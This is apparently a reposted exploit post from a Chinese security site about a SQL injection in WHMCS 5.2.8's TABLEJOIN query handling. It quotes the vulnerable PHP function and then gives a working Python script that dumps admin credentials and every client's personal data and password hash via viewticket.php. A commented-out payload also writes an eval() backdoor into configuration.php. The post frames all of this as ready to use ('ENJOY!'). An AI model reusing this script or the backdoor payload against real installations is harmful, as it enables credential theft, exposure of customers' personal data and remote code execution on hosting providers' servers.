WHMCS 5.2.8 Vulnerability

没穿底裤 2020年1月1日00:25:29评论397 views字数 413阅读1分22秒阅读模式
摘要

Here We Go again Po0r WHMCS new version again got exploited!THIS TIME IT'S again the same mistake in/includes/dbfunctions.php

Here We Go again Po0r WHMCS new version again got exploited!

THIS TIME IT'S again the same mistake in

/includes/dbfunctions.php

WE Can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]');

FROM THIS VULNERABILITY
WE CAN EVEN change /configuration.php whatever we want (PHP code included)
[php]
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
global $CONFIG;
global $query_count;
global $mysql_errors;
global $whmcsmysql;
if (!$fields) {
$fields = '*';
}
$query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
if ($innerjoin) {
$query .= ' INNER JOIN ' . db_escape_string($innerjoin);
}
if ($where) {
if (is_array($where)) {
$criteria = array();
foreach ($where as $origkey => $value) {
$key = db_make_safe_field($origkey);
if (is_array($value)) {
if ($key == 'default') {
$key = '`default`';
}
if ($value['sqltype'] == 'LIKE') {
$criteria[] = $key . ' LIKE /'%' . db_escape_string($value['value']) . '%/'';
continue;
}
if ($value['sqltype'] == 'NEQ') {
$criteria[] = $key . '!=/'' . db_escape_string($value['value']) . '/'';
continue;
}
if ($value['sqltype'] == '>') {
$criteria[] = $key . '>' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '<') {
$criteria[] = $key . '<' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '<=') {
$criteria[] = $origkey . '<=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '>=') {
$criteria[] = $origkey . '>=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == 'TABLEJOIN') {
$criteria[] = $key . '=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == 'IN') {
$criteria[] = $key . ' IN (/'' . implode('/',/'', db_escape_array($value['values'])) . '/')';
continue;
}
continue;
}
[...]
?>[/php]
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!

Exp:
[php]
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection
#

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日00:25:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WHMCS 5.2.8 Vulnerabilityhttp://cn-sec.com/archives/75239.html

发表评论

匿名网友 填写信息